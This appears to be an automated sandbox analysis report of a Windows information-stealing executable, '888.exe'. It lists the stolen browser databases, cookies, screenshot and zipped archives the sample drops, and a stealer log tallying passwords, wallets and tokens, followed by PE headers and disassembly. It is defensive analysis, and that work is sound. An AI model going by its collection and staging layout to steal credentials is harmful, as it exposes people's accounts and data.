                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\History

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):155648
                                                                          Entropy (8bit):0.5407252242845243
                                                                          Encrypted:false
                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\Login Data

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8746135976761988
                                                                          Encrypted:false
                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\Web Data

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lfz2dek.fb1.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwc4sbvb.tuc.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\out.zip

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                          Category:dropped
                                                                          Size (bytes):887832
                                                                          Entropy (8bit):7.525898020436918
                                                                          Encrypted:false
                                                                          SSDEEP:12288:aTiXtd8qjb8g7KuIDw7sRchNQyQAtR7p8Kl8TS03cW/EAoeNQAGOr1bMNJY8l7CN:DXtd8qj/B1kchNQlAtR24w7QLkcCN
                                                                          MD5:ECA8BE836DDA7C73E25894C29DE2FC80
                                                                          SHA1:6284094C3B710851DD0B1B8F1EFD22F09C143BDA
                                                                          SHA-256:7847776B2D0035963969419E4F810BF68645FE697B6E939DF66DE9A46066BBB1
                                                                          SHA-512:5FD8AD0CD8733C3E1E0940B17A492BD0C1B20C3BE441143171CA1AD18F2C496435C73521CCE76D5C7805267F87DE221A16184B292FB281D43B59EDB0C0A61B4D
                                                                          Malicious:false
                                                                          Preview:PK.........e.Y................Autofill/PK.........e.Y................Cookies/PK.........e.Y................CreditCards/PK.........e.Y................Downloads/PK.........e.Y................History/PK.........e.Y................Passwords/PK.........e.Y<V...@...@......screen1.png.PNG........IHDR................C..?.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                                                                          C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):14994
                                                                          Entropy (8bit):7.827266198470604
                                                                          Encrypted:false
                                                                          SSDEEP:384:5kYnj06yZym7oWgYNxkYnj06yZym7oWgYNwb:5kYnjVmGgkYnjVmGJ
                                                                          MD5:DD8BA4DB578CDB1067257DA8383B7C44
                                                                          SHA1:06A673BC5DF871B4F651729DF45ACA3C734D79EA
                                                                          SHA-256:9B441D1D2314D00D8BB486781DE645F2F72E40FF1B54AA57FDFC7E319B09A3BC
                                                                          SHA-512:092714D4BEEBA414BEF583B5C9D08D88E53EB2F0A9A207DFEA3FB67865EB732D7AC1159BCA11584C48B46A5F5185CC053930F90D0571106C01BCCE81F99695E1
                                                                          Malicious:false
                                                                          Preview:PK.........e.Y...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK.........e.Yt..O............DUUDTUBZFW.pdf..I.e!....Q.RQ.P.../..75......s..N.0.....9k..M.F..s.x.cl.O~.P....k.H.}..:}u1..R5-}..>..:.2.."..<.\E...^E`....U.m.Y.*.....c..:.|....1....u.E.R.pw.Zt...D...52...........A....../"4.9.........0..1.}!Z.....W..&h.*t.....C.[.....,......!.-..R...XKP.a.rW.....0jLP

                                                                          C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Chrome_Default_Network.txt

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.7588025104123
                                                                          Encrypted:false
                                                                          SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                                                                          MD5:07691E9F2983932701060D0FC5588075
                                                                          SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                                                                          SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                                                                          SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                                                                          Malicious:false
                                                                          Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

                                                                          C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\screen1.png

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):868353
                                                                          Entropy (8bit):7.512401035123968
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BTiXtd8qjb8g7KuIDw7sRchNQyQAtR7p8Kl8TS03cW/EAoeNQAGOr1bMNJY8lb:8Xtd8qj/B1kchNQlAtR24w7QLkq
                                                                          MD5:CE20C349B432C15F92CEDE25CFC21FFA
                                                                          SHA1:9AD4EB12A796C735F4A4812A2DF4EF54868CC7B1
                                                                          SHA-256:9A270BD08E0EAAE89C41E5513E765CE0020A0EE1C5CEDC1C86E3211DEDF9A8E2
                                                                          SHA-512:612A2659A9C4CB930E18DCD3136820F66810213979026400848EEF70FA38D1686F866F2FEDFCC03DF06D26542F43CA6AF72CA96171600D5AFEEEFD8E8A9981F1
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR................C..?.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                                                                          C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):14994
                                                                          Entropy (8bit):7.827266198470604
                                                                          Encrypted:false
                                                                          SSDEEP:384:5kYnj06yZym7oWgYNxkYnj06yZym7oWgYNwb:5kYnjVmGgkYnjVmGJ
                                                                          MD5:DD8BA4DB578CDB1067257DA8383B7C44
                                                                          SHA1:06A673BC5DF871B4F651729DF45ACA3C734D79EA
                                                                          SHA-256:9B441D1D2314D00D8BB486781DE645F2F72E40FF1B54AA57FDFC7E319B09A3BC
                                                                          SHA-512:092714D4BEEBA414BEF583B5C9D08D88E53EB2F0A9A207DFEA3FB67865EB732D7AC1159BCA11584C48B46A5F5185CC053930F90D0571106C01BCCE81F99695E1
                                                                          Malicious:false
                                                                          Preview:PK.........e.Y...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK.........e.Yt..O............DUUDTUBZFW.pdf..I.e!....Q.RQ.P.../..75......s..N.0.....9k..M.F..s.x.cl.O~.P....k.H.}..:}u1..R5-}..>..:.2.."..<.\E...^E`....U.m.Y.*.....c..:.|....1....u.E.R.pw.Zt...D...52...........A....../"4.9.........0..1.}!Z.....W..&h.*t.....C.[.....,......!.-..R...XKP.a.rW.....0jLP

                                                                          C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):717
                                                                          Entropy (8bit):5.32626050217476
                                                                          Encrypted:false
                                                                          SSDEEP:12:eM3lxmRQN3oi238Q8bjx6YjACrJFh9+lQM7NlVaZBQM3aWflIHdAMij01mMXaBLZ:eQNNYv38xxVjAI5XM7NlVaZe8lOAMijV
                                                                          MD5:E53295AB504E2E72AFDA52BB58E343D0
                                                                          SHA1:DD6A3D44C43D0233398779E4C11C0293D93EF9B0
                                                                          SHA-256:B14F35461C08944170211D7B6AEFE8217105716B0B59861DBDEBCA16A18FD56D
                                                                          SHA-512:0EF55005D2AF500F276DB06CAF6B8E911EFF6CE534B114C57F2F0193AE949B11DDCB4D2E3AD00D3DCC6BFCC2ABB5001FB6ECB0C22D992CA4162F5B5CF9F51850
                                                                          Malicious:false
                                                                          Preview:..- IP Info -....IP: 8.46.123.189..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: PGUZEPW (1280, 1024)..HWID: 8671303959770644..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\888.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 20...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Telegram: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:

                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):6.549321465629513
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:888.exe
                                                                          File size:4'885'504 bytes
                                                                          MD5:b6e5859c20c608bf7e23a9b4f8b3b699
                                                                          SHA1:302a43d218e5fd4e766d8ac439d04c5662956cc3
                                                                          SHA256:bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
                                                                          SHA512:60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c
                                                                          SSDEEP:98304:MUnvs+Q1S4tPjBjz7eO9C8LJ/INWoDBk:pPoljfT/J8
                                                                          TLSH:3C36AF82FAC342FED98B15B0202FB73FDB351D0E8214CB93EBD45D21E866712599A25D
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}C.t.C.t.C.t.J...Q.t.Ebq/d.t.Ebp/R.t.Ebw/W.t...u/U.t...u/@.t.C.u.k.t..bp/Y.t.C.t.G.t..bv/B.t.RichC.t.........PE..L.....Df...

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x746992
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6644CE9A [Wed May 15 15:02:50 2024 UTC]
                                                                          TLS Callbacks:0x6116f0
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:2cf92bf8d9707fcbea09d995433c19b6

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007F2E4CEB0ECEh
                                                                          jmp 00007F2E4CEB02B9h
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ecx
                                                                          lea ecx, dword ptr [esp+04h]
                                                                          sub ecx, eax
                                                                          sbb eax, eax
                                                                          not eax
                                                                          and ecx, eax
                                                                          mov eax, esp
                                                                          and eax, FFFFF000h
                                                                          cmp ecx, eax
                                                                          jc 00007F2E4CEB044Ch
                                                                          mov eax, ecx
                                                                          pop ecx
                                                                          xchg eax, esp
                                                                          mov eax, dword ptr [eax]
                                                                          mov dword ptr [esp], eax
                                                                          ret
                                                                          sub eax, 00001000h
                                                                          test dword ptr [eax], eax
                                                                          jmp 00007F2E4CEB042Bh
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ebx
                                                                          push esi
                                                                          mov eax, dword ptr [esp+18h]
                                                                          or eax, eax
                                                                          jne 00007F2E4CEB045Ah
                                                                          mov ecx, dword ptr [esp+14h]
                                                                          mov eax, dword ptr [esp+10h]
                                                                          xor edx, edx
                                                                          div ecx
                                                                          mov ebx, eax
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          div ecx
                                                                          mov edx, ebx
                                                                          jmp 00007F2E4CEB0483h
                                                                          mov ecx, eax
                                                                          mov ebx, dword ptr [esp+14h]
                                                                          mov edx, dword ptr [esp+10h]
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          shr ecx, 1
                                                                          rcr ebx, 1
                                                                          shr edx, 1
                                                                          rcr eax, 1
                                                                          or ecx, ecx
                                                                          jne 00007F2E4CEB0436h
                                                                          div ebx
                                                                          mov esi, eax
                                                                          mul dword ptr [esp+18h]
                                                                          mov ecx, eax
                                                                          mov eax, dword ptr [esp+14h]
                                                                          mul esi
                                                                          add edx, ecx
                                                                          jc 00007F2E4CEB0450h
                                                                          cmp edx, dword ptr [esp+10h]
                                                                          jnbe 00007F2E4CEB044Ah
                                                                          jc 00007F2E4CEB0449h
                                                                          cmp eax, dword ptr [esp+0Ch]
                                                                          jbe 00007F2E4CEB0443h
                                                                          dec esi
                                                                          xor edx, edx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebx
                                                                          retn 0010h
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ebx
                                                                          mov eax, dword ptr [esp+14h]
                                                                          or eax, eax
                                                                          jne 00007F2E4CEB045Ah
                                                                          mov ecx, dword ptr [esp+10h]
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          xor edx, edx
                                                                          div ecx
                                                                          mov eax, dword ptr [esp+08h]

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [IMP] VS2008 SP1 build 30729

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4883ac0x1a4.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4910000x1b9b0.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x485b680x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x485bc00x18.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x485aa80x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x35a0000x4c0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x3581490x35820058b136b0f6e324f2ea36c2001a61946aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x35a0000x1300760x130200c9dcd221b89f5ff0a86117992a3d645eFalse0.4299684674270448data5.926312917040969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x48b0000x529c0x4a00cddfd669d1b848d82c68d8beaa9711ecFalse0.5308277027027027Matlab v4 mat-file (little endian) , numeric, rows 4394632, columns 05.058826172235092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .reloc0x4910000x1b9b00x1ba00f2f1f26ec7745ce120ed00fd5821e132False0.6490384615384616data6.68083376427154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Imports

                                                                          DLLImport
                                                                          ntdll.dllNtCancelIoFileEx, NtCreateFile, NtWriteFile, NtReadFile, RtlNtStatusToDosError, NtDeviceIoControlFile, RtlCaptureContext, RtlUnwind
                                                                          kernel32.dllGetFileInformationByHandle, FlushFileBuffers, WakeConditionVariable, SleepConditionVariableSRW, GetModuleHandleA, GetProcAddress, GetCurrentThread, InitOnceBeginInitialize, TlsAlloc, InitOnceComplete, TlsFree, GetStdHandle, GetConsoleMode, MultiByteToWideChar, WriteConsoleW, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, WaitForSingleObjectEx, WakeAllConditionVariable, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, SetFilePointerEx, FindNextFileW, CreateDirectoryW, FindFirstFileW, FindClose, SetThreadStackGuarantee, SetFileCompletionNotificationModes, CreateIoCompletionPort, TryAcquireSRWLockExclusive, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, CreateNamedPipeW, AddVectoredExceptionHandler, ReadFileEx, SleepEx, RaiseException, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, GetSystemTimeAsFileTime, GetCurrentDirectoryW, AcquireSRWLockShared, ReleaseSRWLockShared, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, UnhandledExceptionFilter, GetLastError, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, 